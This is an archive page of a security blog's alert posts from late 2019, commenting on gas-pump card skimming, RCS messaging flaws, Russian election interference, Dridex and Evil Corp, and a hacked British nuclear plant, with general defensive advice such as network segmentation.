Category Archives: Alert

Security alerts

VISA SAYS: Ongoing Cyber Attacks at Gas Pumps

Visa published an alert that says that point of sale (PoS) system of North American Fuel Dispenser Merchants (as in gas stations and the folks that make the systems that allow you to “pay at the pump”) are being targeted in credit card skimming attacks.

The attack is ongoing, increasing and coordinated – by cybercrime groups.

The Visa fraud disruption unit alert described several attacks.  While stores were supposed to installed chip readers by 2015 (if they don’t they get to pay for any fraud linked to their lack of chip card readers) but gas stations got an extension and are just now installing chip readers in pumps (they were supposed to do it by October 2019, but now they have until October 2020).

One of the benefits of chip readers is that the card information is encrypted at the pump and not decrypted until it arrives at the gas station’s bank.  Since most pumps still have not been upgraded, the data does not get encrypted until it leaves the gas station, if at all.

This means that if the hacker can get malware installed in the gas station they can likely read the credit cards.

Here is the part that affects all businesses:

Individual gas stations are independent from the brands, for the most part, and many are completely independent.  That makes them small businesses that don’t have an IT department.

The attacks usually start by infecting the computer in the office – someone is bored and surfs the web.  They visit a sketchy web site and click on an infection link.

Because gas station owners are not IT or security experts, everything is on the same network – as is often the case in many (most?) small to medium sized businesses.

What businesses need to do is SEGMENT their networks – separate different parts of their business from each other – the WiFi should be separate from the credit card system from the smart TV, from the gas pumps, etc.

Doing that makes it MUCH harder for hackers in any business to get to where they want.  In the Target breach, the hackers compromised a server used by vendors to get projects and submit invoices, but that server, because of a lack of segmentation, could talk to the credit card system.

It takes a little work to design a correctly segmented network that will limit the damage that hackers can do while still letting your employees do what they need to do, but recovering from an attack takes a lot more work than preventing one.

On a separate note, if you are concerned about your credit card getting compromised at a gas pump, you can a couple of things to improve your odds:

  • Use a pump closest to the store – it is the least likely to have a skimmer attached.  That won’t help if the hacker installs malware on the station’s network though
  • Patronize gas stations that have upgraded their pumps (those are the ones that tell you to leave your card in the reader until they ask you to remove it)
  • Pay inside – sometimes but not always – that computer gets upgraded before the pumps get upgraded.  Watch how they process your card – if they swipe it, it hasn’t been upgraded.  If they insert it and wait, it has been
  • Last option, if you have to, pay cash

Gas stations are frequent targets because crooks can get to the pump at 3:00 in the morning when no one is there and they have really poor cybersecurity, except, MAYBE, for stations that are owned by the oil companies themselves.  Apparently, according to Visa, that is becoming a real problem, but it is a great opportunity for other businesses to get ahead of the attacks.

Source: Bleeping Computer

 

Facebooktwitterredditlinkedinmailby feather

From Unsecure to Less Unsecure

Text messages, as many people know are not very secure.  If you are asking where we are meeting for lunch, you probably don’t care.  But many banks use text messages (technically known as SMS or Short Message Service) as a second factor to enhance login security.  While it does help some, it would be  a lot better if SMS messages were secure.

Add to that the limited character length allowed in SMS (only a bit longer than the original Twitter at 162 characters, but that is sometimes masked by phone makers text messaging applications), the fact that photos sent by SMS have to be compressed down to be barely identifiable and the fact that it can be hijacked, we have been needing a replacement.

Enter RCS or Rich Communications Services.  RCS eliminates a lot of these shortcomings.  Supposedly the big four (soon to be three) US carriers say it is coming in 2020, even though the standard has been around for 10 years.

But the way the carriers are implementing it is not very secure as researchers are starting to point out.

While you can pick a different text messaging app like iMessage, Whatsapp or Signal, for example, for talking to your friends and have enhanced privacy with them, you don’t have any control over which text messaging service your bank uses, leaving you more vulnerable than alternative solutions such as Google Authenticator or Authy, generically known as Time based One Time Passwords or TOTP.

So what are the carriers doing wrong?

SRSLabs researchers are going to talk about the holes that they have found at Black Hat Europe in December.  Hopefully the carriers get embarrassed and fix some of these bugs before the systems go live next year.

The issue SRSLabs seems to have a problem with is the way the standard for RCS is being implemented, rather than the standard itself.  This is actually good news because it means that a software patch can improve security and it doesn’t require changes to the standard.  Even with these fixes, RCS is **NOT** encrypted end to end like iMessage or Whatsapp.

One issue is security around how RCS configuration files, which contain the userid and password for your text messages are secured.  In that case, there is no security, meaning any app can request the configuration and have access to your text messages.

Another one sends a six digit code to identify you are who you say you are but lets you have unlimited guesses.  To try all the possible numbers takes about five minutes.

The carriers, of course, are completely defensive, but I suspect after Black Hat makes their sloppiness public, many of the carriers will clean up their acts.

Which is good for users.

Bottom line though, if you want more private text messages, use something like iMessage or Signal – RCS is not going to solve that problem.  Even if the carriers fix their implementation bugs in RCS, it will just be less unsecure.  Source:  Vice

 

 

 

 

Facebooktwitterredditlinkedinmailby feather

In Case You Thought Russia Was Done Meddling With Elections …

Politics is a pretty interesting game.

In the United States, almost everyone, except the President, thinks that Russia interfered with the 2016 US Presidential elections.

In the UK, there is a report – that the current Prime Minister Boris Johnson has refused to release – on Russian interference in British politics, with some accusing Johnson of a coverup.

Likely in both cases, there are additional agendas.

There is a British election this week after Johnson was unable to get Parliament to agree to his plan for leaving the EU (sound familiar?  The last British PM lost her job for the same reason).  And since politics is a full contact sport everywhere, Johnson’s competitor for the job, Jeremy Corbyn, released some documents that say that Johnson would offer to sell Britain’s National Health Service (NHS) to United States corporations in a trade deal with President Trump.  In Britain, the NHS is considered a national treasure and offering to privatize it to a foreign company is not considered a route to getting yourself elected.  Corbyn “declined” to say where he got the documents and the British government says that they think the documents are real.

One of the places these documents were posted was the social media site Reddit.

Reddit said this past week that the document leak was part of a Russian influence operation known as Secondary Infektion.  It is likely that Secondary Infektion is part of the Russian hacking group Sandworm (if you are interested in this kind of intrigue, I highly recommend the book Sandworm), which is part of Russia’s military Intelligence known as GRU.  As a result of their investigation, Reddit has banned 61 accounts.  Of course, there is nothing to stop the Russians from creating new accounts.

The combination of Johnson’s refusal to release the report on past Russian hacking of British elections and the posting of and Corbyn’s use of these new documents indicates that Russian interference in worldwide politics has not stopped or slowed down.

It also means that, short of a miracle, Russia will likely interfere with the US elections next year.  Using cyber theft (DNC emails, Clinton Emails, Boris Johnson documents) is far easier than hacking into a whole bunch of election machines and changing votes, so that is likely the route the Russians will take next year.

Whether Russia’s release of the Boris Johnson documents will affect this week’s British Prime Minister’s election is unknown and even if Johnson loses, he can blame many factors other than Russia for his loss.

Still, is shows that politics remains a full contact sport – a reality that is not likely to change anytime soon.

Information for this post came from the Guardian.

 

Facebooktwitterredditlinkedinmailby feather

Security News for the Week Ending December 6, 2019

Caller Poses as CISA Rep in Extortion Scam

Homeland Security’s CISA (Cybersecurity and Infrastructure Security Agency) says that they are aware of a scam where a caller pretends to be a CISA rep and claims to have knowledge of the potential victim’s questionable behavior.  The caller then attempts to extort the potential victim.

CISA says not to fall for the scam, do not pay the extortion and contact the FBI.  Source: Homeland Security.

Senate Committee Approves $250 Mil for Utility Security

The PROTECT  program would provide grants for utilities to improve their security.  Given that a carefully distributed government report says that the Russians (and not the Chinese) have compromised a number of US utilities already, improving security is probably a smart idea. The nice part is that it is a grant.  The important part is that the money would be spread out over 5 years, so in reality, we are talking about spending $50 million a year.  It also seems to be focused on electric and doesn’t seem to consider water or other utilities.  There are around 3,300 electric utilities alone in the US.  If we ignore everything but electric and spread the money equally (which of course, they won’t), every utility would get $15,000.  That will definitely get the job done.  NOT!  Source: Nextgov

Smith & Wesson’s online Store Hacked by Magecart

Lawrence Abrams of Bleeping Computer fame tried to warn Smith & Wesson that their online store had been compromised by the famous Magecart malware.  The join the likes of British Airways (183 million Euro fine) and thousands of others.  Abrams did not hear back from them by publication time.  Source: Bleeping Computer

Another MSP Hit by Ransomware Attack

CyrusOne, one of the larger MSPs was hit by a ransomware attack which affected some of their customers.  As I said in my blog post earlier this week, attacks against MSPs are up because they are juicier targets.

In CyrusOne’s case, they said the victims were primarily in a data center in New York (which hopefully means that they have segmented their network), it did not affect their colo customers, only their managed customers (because in a colo, the provider does not have credentials to their customer’s servers) and they are investigating.

This just is one more reminder that you can outsource responsibility to a service provider, but the buck still stops with you when the provider is hacked.  Source: MSSP Alert

Reuters Says Census Test Run in 2018 Was Attacked By Russia

Commerce outsourced the first digital census to Pegasystems and at last check the cost has doubled to $167 million.  More importantly, in a 2018 test, Russian hackers (not China) were able to penetrate a firewall and get into places where they should not have been.  In addition, the test was hit with DNS attacks.

Sources say this raises concerns whether T-Rex Solutions, the Commerce Department’s main security contractor, can keep the Russians out when the site actually goes live.  Or the Chinese. Or other countries that would like to embarrass us.

Census said (a) no comment, (b) no data was stolen (this was likely a reconnaissance test by the Russians, so no surprise) and (c) the system worked as designed (i.e. the Russians got in and we panicked).

Clearly if the Russians are able to compromise the Census, that would be a HUGE black eye for this President and the Executive Branch.

They can hide things during a test, but cannot hide them when it goes live, so lets hope they are able to fix it.  Source: Reuters

Facebooktwitterredditlinkedinmailby feather

Feds Offer $5 Mil For Evil Corp. Leader

Not sure if this is inspired by the Mr. Robot Series (Evil Corp) or not, but this guy is in big trouble now.

He is being charged with conspiracy, conspiracy to commit fraud, wire fraud, bank fraud and intentional damage to a computer.

The feds say that he stole tens of millions using the banking trojans Dridex and Zeus.  He drives a custom Lamborghini, they say.

In addition to putting out the arrest warrant, Treasury is sanctioning his company.

While I don’t think that President Trump’s bestie, Vladimir Putin, is going to turn the guy over to us, as a high roller, the treasury sanctions mean that he cannot access the U.S. financial system – banks, credit cards, wire transfers, etc. will all be frozen if he  tries.  He also cannot travel to all of those beautiful, warm, scenic vacation spots he is used to.  I hear Kiev is nice this time  of year, however.  If he goes through customs in any country we have an extradition treaty with, he will be immediately arrested.  That recently happened when a Russian hacker visited Israel.  He is now in federal custody awaiting trial in the United States after spending 4 years in a nice Israeli prison.

$5 million is the largest reward the feds have ever offered for something like this.

Of course, in the decade that he has been active, he stole tens of millions of dollars from his victims by using those trojans to empty their bank accounts.  By 2015 Dridex was among the active banking trojans in the wild.

The trojan would transfer money to the account of a “money mule” and the mules would then forward the money on to the bad guys, keeping a slice for themselves.

The trojan targeted banks, companies, cities; even non-profits, as well as individuals.

Separately, the FBI issued an alert about this trojan.  It is pretty active, stealing people’s money.  Still.   It can interfere with your web browsing (redirecting you to attacker controlled web sites), among other nasty actions.  This version can even lead to a ransomware attack, encrypting files on your computer.   Sometimes the attack is combined with Powershell Empire, which allows it to do reconnaissance and move laterally to other machines on your network.  This combination would allow it to encrypt all computers on your network.

If you do not have access to the FBI alert, contact me;  I cannot post it publicly but I can provide a copy to appropriate people.

While the FBI is not saying, given the size of the reward offered and also the alert, there must be a lot of (stolen) money involved.

Information for this post came from Threat Post and the FBI.

Facebooktwitterredditlinkedinmailby feather

British Nuke Plant Attack Kept Quiet

The nuclear power industry has always been nervous about people’s fear of some form of nuclear meltdown.  Whether it was Three Mile Island or Chernobyl, the spectre of something bad happening at a nuclear plant has been the story of made for TV movies.

The UK Telegraph newspaper has obtained information, using a freedom of information request, that indicates that the UK National Cyber Security Center, part of the GCHQ (sort of equivalent to the US NSA), has been helping a British nuclear plant recover from a cyber attack.

This news comes after reports last year from the FBI and DHS that the Russians (and not the Chinese) have been have been attacking our critical infrastructure, at least since 2016.

Because they are worried that people will freak out, they are keeping the details of who was hacked and what was hacked secret.  I am sure that will make people feel better.  Unless the attack was really bad.  In which case not knowing and speculating might be better than knowing.

The document, from a Nuclear Decommissioning Agency Board Meeting was dated March 13, 2019.  The Telegraph says that it is likely the first KNOWN successful cyber attack on a British nuclear plant.  I am not sure how comforting that is.  They are not suggesting that it is the first successful attack but rather the first successful attack that we have heard about.

Since no one is providing details, we don’t know whether this is a Chernobyl-style issue or a random computer virus on an office computer.  On the other  hand, if they had to ask GCHQ for help, I am guessing that it is not an office virus.

One security expert pointed out that if you assume whichever nuke plant or plants were hacked are no less secure than the ones that haven’t been hacked YET, it isn’t smart to tell other hackers how this or these plants were hacked.

This follows on to the revelation in October that an Indian nuclear plant was hacked – after they first said that reports of a hack was a lie.  I guess the lie was by the Indian government.

This also follows the WSJ article that said that  more than a dozen US utilities were targeted (I assume successfully) by hackers recently

In fairness we should not forget that the US hacked Iran’s nuclear program years ago.  We would say that we are the good guys, so that is okay.  Not everyone might agree with that interpretation, including Russia, so they might say that the US legitimized hacking the nuclear industry.  Source: The Telegraph .

 

 

 

 

 

Facebooktwitterredditlinkedinmailby feather